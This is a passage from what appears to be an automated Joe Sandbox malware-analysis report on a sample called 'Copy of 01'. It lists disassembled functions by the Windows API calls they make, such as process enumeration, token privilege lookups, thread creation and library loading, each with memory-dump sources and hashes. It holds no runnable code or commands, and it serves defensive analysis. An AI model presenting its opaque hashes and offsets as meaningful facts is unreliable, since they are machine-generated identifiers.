                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
                        • Instruction ID: 8853ca371687360ea9dc42a61dea68c52461c0ef7ca459e99e6d3437f1286628
                        • Opcode Fuzzy Hash: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
                        • Instruction Fuzzy Hash: A2417875A092189FCB12DF68C994FA9B7F5BB49354F1A80ACE814EB261C730ED41CF90
                        APIs
                        • GetForegroundWindow.USER32 ref: 003C16EB
                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                        • GetCaretPos.USER32(?), ref: 003C16FF
                        • ClientToScreen.USER32(00000000,?), ref: 003C174C
                        • GetForegroundWindow.USER32 ref: 003C1752
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                        • Instruction ID: d05d3caa42a03390d0c504ba2700c006c6276f29784361a6ee7883597e723079
                        • Opcode Fuzzy Hash: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                        • Instruction Fuzzy Hash: 06313075D00149AFCB05EFA9C8C5DAEB7FDEF49304B5080A9E415EB212D631AE45CFA0
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
                        • Process32NextW.KERNEL32(00000000,?), ref: 0039D52F
                        • CloseHandle.KERNEL32(00000000), ref: 0039D5DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 2958f66433327893670e947a1f5900f4dda3f20c383c09ce3cb3dd5908d72421
                        • Instruction ID: c0eec102c60e0781f6519c89cc481415bd8f4bdffa4fb902937f28755496a902
                        • Opcode Fuzzy Hash: 2958f66433327893670e947a1f5900f4dda3f20c383c09ce3cb3dd5908d72421
                        • Instruction Fuzzy Hash: 133193711083009FD702EF54C882AAFBBE8EF99354F14092DF5858A1A1EB71A949CB92
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • GetCursorPos.USER32(?), ref: 003C9001
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00387711,?,?,?,?,?), ref: 003C9016
                        • GetCursorPos.USER32(?), ref: 003C905E
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00387711,?,?,?), ref: 003C9094
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                        • Instruction ID: e47351993fde7330da3ce92135e4dbd8e26b6a6fc3ae653566620ce078e35e70
                        • Opcode Fuzzy Hash: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                        • Instruction Fuzzy Hash: 1A218336600028EFDB168F95CC58FFA7BB9EF49350F1540AAF5059B261C731AD50DB60
                        APIs
                        • GetFileAttributesW.KERNEL32(?,003CCB68), ref: 0039D2FB
                        • GetLastError.KERNEL32 ref: 0039D30A
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0039D319
                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CCB68), ref: 0039D376
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast
                        • String ID:
                        • API String ID: 2267087916-0
                        • Opcode ID: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                        • Instruction ID: 5c0115bedb4d847c52ad2689509a157380ad01b8d9e9e94939d167c4be403e82
                        • Opcode Fuzzy Hash: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                        • Instruction Fuzzy Hash: CB219F74508201DF8B02DF28C8C28AAB7E8AF56365F104A1DF499C72A1D731DD46CB93
                        APIs
                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0039102A
                          • Part of subcall function 00391014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00391036
                          • Part of subcall function 00391014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391045
                          • Part of subcall function 00391014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0039104C
                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391062
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003915BE
                        • _memcmp.LIBVCRUNTIME ref: 003915E1
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00391617
                        • HeapFree.KERNEL32(00000000), ref: 0039161E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                        • String ID:
                        • API String ID: 1592001646-0
                        • Opcode ID: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                        • Instruction ID: 95ddcf0473b55c4ba3f7889cc4eecd279eda924eade2f774c3161efb01ef2b4f
                        • Opcode Fuzzy Hash: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                        • Instruction Fuzzy Hash: 02217832E4010AAFDF12DFA4C945BEEB7B8EF45344F0A4459E845BB241E730AA05CBA0
                        APIs
                        • GetWindowLongW.USER32(?,000000EC), ref: 003C280A
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2824
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2832
                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003C2840
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                        • Instruction ID: 0796af52e4974af942ec8f2df06a6833478c89560e4e4d0448032d4a9a411893
                        • Opcode Fuzzy Hash: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                        • Instruction Fuzzy Hash: F121A135204611AFD7169B24C895FAB7B99AF46324F15815CF42ACB6E2CB71FC42CB90
                        APIs
                          • Part of subcall function 00398D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398D8C
                          • Part of subcall function 00398D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00398DB2
                          • Part of subcall function 00398D7D: lstrcmpiW.KERNEL32(00000000,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398DE3
                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397923
                        • lstrcpyW.KERNEL32(00000000,?), ref: 00397949
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397984
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen
                        • String ID: cdecl
                        • API String ID: 4031866154-3896280584
                        • Opcode ID: bde52a67e4e4dda7a7e3e6e0fddeb1c5b6db6005047bd43a46ff930a5f4ce567
                        • Instruction ID: 16b698e8333b539ea5ab66d2ec50087ade0f5d4b5570780393464c2f931032da
                        • Opcode Fuzzy Hash: bde52a67e4e4dda7a7e3e6e0fddeb1c5b6db6005047bd43a46ff930a5f4ce567
                        • Instruction Fuzzy Hash: 3611D67A210242AFDF165F39D845E7A77A9FF85350B50402AF946CB2A4EF319811C751
                        APIs
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C7D0B
                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 003C7D2A
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003C7D42
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003AB7AD,00000000), ref: 003C7D6B
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID:
                        • API String ID: 847901565-0
                        • Opcode ID: 8b70404518c3d00a06e5258fb13c38e6cf081e847ebc56d57033b95b79cd4e0e
                        • Instruction ID: e8a62d088452d63de6ef32efa18bedc9b27ef7733e17016f7cfb587f13716fa2
                        • Opcode Fuzzy Hash: 8b70404518c3d00a06e5258fb13c38e6cf081e847ebc56d57033b95b79cd4e0e
                        • Instruction Fuzzy Hash: 1E114D72515615AFCB129F28DC08EA63BA9AF45360F168728FC3ADB2F0D7309D51DB50
                        APIs
                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 003C56BB
                        • _wcslen.LIBCMT ref: 003C56CD
                        • _wcslen.LIBCMT ref: 003C56D8
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen
                        • String ID:
                        • API String ID: 455545452-0
                        • Opcode ID: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                        • Instruction ID: 22287c36b5ac00fff2bdcd830440f22e9b75c4402d7990ab78637c68218876bb
                        • Opcode Fuzzy Hash: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                        • Instruction Fuzzy Hash: FF11E13160060896DB229F61CC85FEE77ACAF10364F10406EF905D6081E770EEC4CB60
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00391A47
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A59
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A6F
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                        • Instruction ID: b90c88207dc31e11f5da24d8cb07e489e1f301bd39096a200b6d630b10bad62f
                        • Opcode Fuzzy Hash: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                        • Instruction Fuzzy Hash: 9511F73AD01219FFEF119BA5C985FADFB78EB08750F210091EA04B7290D671AE50DB94
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 0039E1FD
                        • MessageBoxW.USER32(?,?,?,?), ref: 0039E230
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0039E246
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0039E24D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                        • Instruction ID: e305e04b62d5c1863d0e14dc17cfa75b1e98893502a2397268daf138d22a0d7b
                        • Opcode Fuzzy Hash: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                        • Instruction Fuzzy Hash: C3112B76D04258BFDB02EFA8DC05E9E7FACEB45310F144625F824E3691D670DD0487A0
                        APIs
                        • CreateThread.KERNEL32(00000000,?,0035CFF9,00000000,00000004,00000000), ref: 0035D218
                        • GetLastError.KERNEL32 ref: 0035D224
                        • __dosmaperr.LIBCMT ref: 0035D22B
                        • ResumeThread.KERNEL32(00000000), ref: 0035D249
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                        • String ID:
                        • API String ID: 173952441-0
                        • Opcode ID: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
                        • Instruction ID: 3d98d1210983d9bbedcfbfe07f175b4b80c5c73e094e9e9eef0fc06e003adedb
                        • Opcode Fuzzy Hash: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
                        • Instruction Fuzzy Hash: 0701D276815208BBCB235BA6DC09FAE7A6DDF81332F114619FD259A1F0DB708909C7A0
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                        • GetStockObject.GDI32(00000011), ref: 00336060
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateMessageObjectSendStockWindow
                        • String ID:
                        • API String ID: 3970641297-0
                        • Opcode ID: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
                        • Instruction ID: 5fe8a6a40ba88ca14cd9fbb9980663d0ce1b1f74985f7765a2e189c446f76f55
                        • Opcode Fuzzy Hash: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
                        • Instruction Fuzzy Hash: FD116D72505508BFEF174FA49C86EEABB6DEF093A4F055215FA1992120D732EC60DBA0
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00353B56
                          • Part of subcall function 00353AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00353AD2
                          • Part of subcall function 00353AA3: ___AdjustPointer.LIBCMT ref: 00353AED
                        • _UnwindNestedFrames.LIBCMT ref: 00353B6B
                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00353B7C
                        • CallCatchBlock.LIBVCRUNTIME ref: 00353BA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                        • String ID:
                        • API String ID: 737400349-0
                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction ID: 328b1b9ceca077ebae6c275da7bf5cf183d039f03c87f4b4e1d023ef9d03f0be
                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction Fuzzy Hash: 43012932100148BBDF125E95CC42EEB3B69EF48799F054014FE489A121D732E965DBA0
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003313C6,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue), ref: 003630A5
                        • GetLastError.KERNEL32(?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000,00000364,?,00362E46), ref: 003630B1
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000), ref: 003630BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
                        • Instruction ID: 14b6001cfe5ccbd64f426a1cad2271099d006b326be3a7b1b6db24be0579c591
                        • Opcode Fuzzy Hash: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
                        • Instruction Fuzzy Hash: 2601D432312222ABCB334A79AC44E677B9CEF05BA1F158620F90BE3144C721D909C7E0
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0039747F
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00397497
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003974AC
                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003974CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Type$Register$FileLoadModuleNameUser
                        • String ID:
                        • API String ID: 1352324309-0
                        • Opcode ID: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
                        • Instruction ID: 31dcb48a65d0d69c7d69db084c395a858fb500c3c8272f4919f707f022109f0e
                        • Opcode Fuzzy Hash: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
                        • Instruction Fuzzy Hash: 9011A1B12253119BEB228F16DC08FA27BFCEF00B00F108569E61AD6592D770F904DB90
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0C4
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0E9
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0F3
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B126
                        Memory Dump Source
